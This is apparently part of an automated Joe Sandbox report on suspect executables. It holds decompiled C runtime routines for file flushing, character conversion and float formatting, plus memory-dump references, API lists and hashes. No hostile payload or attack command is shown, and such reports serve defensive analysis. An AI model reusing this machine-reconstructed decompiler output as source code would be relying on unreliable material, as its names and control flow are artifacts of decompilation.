                                                                                                                                                                                                          									_t48 = _t100 + 0xc;
                                                                                                                                                                                                          									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                          									__eflags =  *_t48;
                                                                                                                                                                                                          									goto L34;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t99 = _t81;
                                                                                                                                                                                                          								__eflags = _t81 - _t78;
                                                                                                                                                                                                          								if(_t81 >= _t78) {
                                                                                                                                                                                                          									_t99 = _t78;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                                                                                                                                                          								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                                                                                                                                                          								 *_t100 =  *_t100 + _t99;
                                                                                                                                                                                                          								_t101 = _t101 + 0xc;
                                                                                                                                                                                                          								_t81 = _t81 - _t99;
                                                                                                                                                                                                          								_v8 = _v8 + _t99;
                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                          								L31:
                                                                                                                                                                                                          								__eflags = _t81;
                                                                                                                                                                                                          							} while (_t81 != 0);
                                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                          					_t61 = E0040BFC1(_t105);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					 *_t61 = 0x16;
                                                                                                                                                                                                          					E0040E744(_t90, 0, _t100);
                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





























                                                                                                                                                                                                          0x0040bb38
                                                                                                                                                                                                          0x0040bb3a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bb3c
                                                                                                                                                                                                          0x0040bbf1
                                                                                                                                                                                                          0x0040bbf1
                                                                                                                                                                                                          0x0040bbf1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bbf1
                                                                                                                                                                                                          0x0040bb42
                                                                                                                                                                                                          0x0040bb44
                                                                                                                                                                                                          0x0040bb46
                                                                                                                                                                                                          0x0040bb48
                                                                                                                                                                                                          0x0040bb48
                                                                                                                                                                                                          0x0040bb50
                                                                                                                                                                                                          0x0040bb55
                                                                                                                                                                                                          0x0040bb58
                                                                                                                                                                                                          0x0040bb5a
                                                                                                                                                                                                          0x0040bb5d
                                                                                                                                                                                                          0x0040bb5f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bbe1
                                                                                                                                                                                                          0x0040bbe1
                                                                                                                                                                                                          0x0040bbe1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040bb2a
                                                                                                                                                                                                          0x0040bb24
                                                                                                                                                                                                          0x0040bac8
                                                                                                                                                                                                          0x0040bac8
                                                                                                                                                                                                          0x0040bacd
                                                                                                                                                                                                          0x0040bace
                                                                                                                                                                                                          0x0040bacf
                                                                                                                                                                                                          0x0040bad0
                                                                                                                                                                                                          0x0040bad1
                                                                                                                                                                                                          0x0040bad2
                                                                                                                                                                                                          0x0040bad8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040badd

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                                                          • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                                                          • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                                                          • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                                                            • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3240763771-0
                                                                                                                                                                                                          • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                          • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02CC553A
                                                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 02CC556E
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02CC559F
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02CC560D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                                                                          • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                          • Instruction ID: 07d83873620e1095b3ab4d8e3fa0eb3d06c225d70c8dc1196a63a4d8f12efdbe
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C31D631A10285EFDB20DF64C884ABE7BB6FF41394FA445ADE465AB191E730EA40DF50
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                          				char _t43;
                                                                                                                                                                                                          				char _t46;
                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                          				int _t57;
                                                                                                                                                                                                          				int _t58;
                                                                                                                                                                                                          				signed short* _t59;
                                                                                                                                                                                                          				short* _t60;
                                                                                                                                                                                                          				int _t65;
                                                                                                                                                                                                          				char* _t72;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t72 = _a8;
                                                                                                                                                                                                          				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					if( *_t72 != 0) {
                                                                                                                                                                                                          						E0040EC86( &_v20, _a16);
                                                                                                                                                                                                          						_t43 = _v20;
                                                                                                                                                                                                          						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                                                          						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                                                          							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                                                                          							__eflags = _t46;
                                                                                                                                                                                                          							if(_t46 == 0) {
                                                                                                                                                                                                          								__eflags = _a4;
                                                                                                                                                                                                          								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									L10:
                                                                                                                                                                                                          									__eflags = _v8;
                                                                                                                                                                                                          									if(_v8 != 0) {
                                                                                                                                                                                                          										_t53 = _v12;
                                                                                                                                                                                                          										_t11 = _t53 + 0x70;
                                                                                                                                                                                                          										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                          										__eflags =  *_t11;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									return 1;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								L21:
                                                                                                                                                                                                          								_t54 = E0040BFC1(__eflags);
                                                                                                                                                                                                          								 *_t54 = 0x2a;
                                                                                                                                                                                                          								__eflags = _v8;
                                                                                                                                                                                                          								if(_v8 != 0) {
                                                                                                                                                                                                          									_t54 = _v12;
                                                                                                                                                                                                          									_t33 = _t54 + 0x70;
                                                                                                                                                                                                          									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                          									__eflags =  *_t33;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								return _t54 | 0xffffffff;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t56 = _v20;
                                                                                                                                                                                                          							_t65 =  *(_t56 + 0xac);
                                                                                                                                                                                                          							__eflags = _t65 - 1;
                                                                                                                                                                                                          							if(_t65 <= 1) {
                                                                                                                                                                                                          								L17:
                                                                                                                                                                                                          								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                                                                                                          								if(__eflags < 0) {
                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t72[1];
                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								L19:
                                                                                                                                                                                                          								_t57 =  *(_t56 + 0xac);
                                                                                                                                                                                                          								__eflags = _v8;
                                                                                                                                                                                                          								if(_v8 == 0) {
                                                                                                                                                                                                          									return _t57;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                          								return _t57;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _a12 - _t65;
                                                                                                                                                                                                          							if(_a12 < _t65) {
                                                                                                                                                                                                          								goto L17;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _a4;
                                                                                                                                                                                                          							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                          							__eflags = _t58;
                                                                                                                                                                                                          							_t56 = _v20;
                                                                                                                                                                                                          							if(_t58 != 0) {
                                                                                                                                                                                                          								goto L19;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t59 = _a4;
                                                                                                                                                                                                          						__eflags = _t59;
                                                                                                                                                                                                          						if(_t59 != 0) {
                                                                                                                                                                                                          							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t60 = _a4;
                                                                                                                                                                                                          						if(_t60 != 0) {
                                                                                                                                                                                                          							 *_t60 = 0;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}


















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                                                                          • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                          • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                          • Instruction ID: a03f6f1118ad3dc04a95bfafb1aa809462bc4ab981edc6e18a6e286535982e66
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C611807240018ABBCF125E85ED45CEE3F63BF48354B6984A9FA185A130D333C6B1EB81
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                          				intOrPtr _t25;
                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t25 = _a16;
                                                                                                                                                                                                          				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                                                                          					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                          					goto L9;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t34 = _t25 - 0x66;
                                                                                                                                                                                                          					if(_t25 != 0x66) {
                                                                                                                                                                                                          						__eflags = _t25 - 0x61;
                                                                                                                                                                                                          						if(_t25 == 0x61) {
                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                          							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							__eflags = _t25 - 0x41;
                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                          								goto L7;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                          						return _t26;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}







                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                          • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.434978323.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2600000_uPD30tM82.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 8c]j$d8bbwe
                                                                                                                                                                                                          • API String ID: 0-3218360112
                                                                                                                                                                                                          • Opcode ID: 17940a1cd4fc9ece399a4b257a1d9878a794696ebf20ef1015919da528c5b1cd
                                                                                                                                                                                                          • Instruction ID: d2b703cb5c54df48bc6c82196c57e376756bdcf8855f192a297135250734ef2a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17940a1cd4fc9ece399a4b257a1d9878a794696ebf20ef1015919da528c5b1cd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53611D30911208CFCB18EFB8E55489DBBB2FF8A315B60566DE41577294DF369C45CB24
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.434978323.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2600000_uPD30tM82.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: cd091eb6c0ef1d7da7bfbf5e1aab4e451c1264e64d3271829a9983be2286ccb0
                                                                                                                                                                                                          • Instruction ID: a3863dd479f963a51fea943ca9212bd0ae7b98e192e355aa4a70bce37747f1e7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd091eb6c0ef1d7da7bfbf5e1aab4e451c1264e64d3271829a9983be2286ccb0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D313EC78941304EFCF26AB60D950E9DB732FF5A306F10947AD81127BACCA3B9952DB11
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.434978323.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2600000_uPD30tM82.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: cbec325028b11f238bcc8c740c1a54f50b631399bcfae79d8658b3a265fa15bd
                                                                                                                                                                                                          • Instruction ID: 0735cafa2a2aceb9f0b57b5d630eb4007e4678eb5fa3f39cdc60f3820c47ba88
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbec325028b11f238bcc8c740c1a54f50b631399bcfae79d8658b3a265fa15bd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C13EC78941304EFCF26AB60D950E9DB732FF5A306F10947AD81127BACCA3B9952DB11
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.434978323.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2600000_uPD30tM82.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 8q
                                                                                                                                                                                                          • API String ID: 0-596622023
                                                                                                                                                                                                          • Opcode ID: 8d0777ed8601c3d611e21f29cc30ddbd17cf753a2d82a9dc4bbcafc43faf9446
                                                                                                                                                                                                          • Instruction ID: 2918f73936929ba078d786033bb6331e7d76899c6704ff2f5489889f5275f3c9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d0777ed8601c3d611e21f29cc30ddbd17cf753a2d82a9dc4bbcafc43faf9446
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BE13E34A00219DFDB18DF65D994B5EBBB2FF88310F148969E416AB3A1DB31EC41CB90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.434978323.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2600000_uPD30tM82.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: k p^
                                                                                                                                                                                                          • API String ID: 0-2009074079
                                                                                                                                                                                                          • Opcode ID: d1bceb8f0776147657455941d1c8c5e7d81c4b9fd7beb10922a5ecceb4d07998
                                                                                                                                                                                                          • Instruction ID: 3a4883bc353a416c721f833112695520ece5d08cb10abf1ebcd06c31e2d9a7c8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1bceb8f0776147657455941d1c8c5e7d81c4b9fd7beb10922a5ecceb4d07998
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2D10078D01228CFDB28DF65C894BEDBBB2BB89305F1091AAD409B7291DB745AC5CF50
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.434978323.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2600000_uPD30tM82.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 8q
                                                                                                                                                                                                          • API String ID: 0-596622023
                                                                                                                                                                                                          • Opcode ID: e7cec2952c4ac95fd2fb025e6d3fde2fa060ffd8c58f766a7d05f9673e0eb8e3
                                                                                                                                                                                                          • Instruction ID: 76bb7f82ee73f746017efc51eae65025dc77c01784babe44b066461fa26a70d4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7cec2952c4ac95fd2fb025e6d3fde2fa060ffd8c58f766a7d05f9673e0eb8e3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA717D34E002098FDB18DFA9C4546AEBBF2FFC9304F24852AE805AB395DB719D46CB51
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.434978323.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2600000_uPD30tM82.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 8q
                                                                                                                                                                                                          • API String ID: 0-596622023
                                                                                                                                                                                                          • Opcode ID: a8b43b476dbee5951964d4ae4724ba39befb3b8a2a976d7d2d548817d23fc151
                                                                                                                                                                                                          • Instruction ID: 49abf4f7ab8a5455771b047792b6166b8d5b98cad54ee0cce88831e570c8b288
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8b43b476dbee5951964d4ae4724ba39befb3b8a2a976d7d2d548817d23fc151
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9681FB74A00209DFCB18DF65D594B9EBBB2FF88310B148959E816AB3A1DB71EC41CF90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.434978323.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2600000_uPD30tM82.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 8c]j
                                                                                                                                                                                                          • API String ID: 0-4231582068
                                                                                                                                                                                                          • Opcode ID: 9a68ec9b6f7edf66095959b23b9c749314f6e85ccde80e0bbd8d76355df7b7fe
                                                                                                                                                                                                          • Instruction ID: 69b56a8cf52b5e084c08a9c4d402f3603e21ff1c9e031d6d7124056e9f673aee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a68ec9b6f7edf66095959b23b9c749314f6e85ccde80e0bbd8d76355df7b7fe
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE11E5312043848FE321AF39E50465B7BE2EFC5304B01896ED08A87682CF79AC098BA1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.434978323.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_2600000_uPD30tM82.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 8c]j
                                                                                                                                                                                                          • API String ID: 0-4231582068
                                                                                                                                                                                                          • Opcode ID: 882297d2d7ffe673bfb7e762a8481adf59c3d9a72a684824c757368d5bae9c99
                                                                                                                                                                                                          • Instruction ID: 282250bf3d8b1f999a2455d23ba08f781fafa5584961cab7b258f0e0398c485c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 882297d2d7ffe673bfb7e762a8481adf59c3d9a72a684824c757368d5bae9c99
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B30192312006488BE324BF78E50465B7BE3FFC4315F008A29D14A87745CF7AAC099BA1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.434978323.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
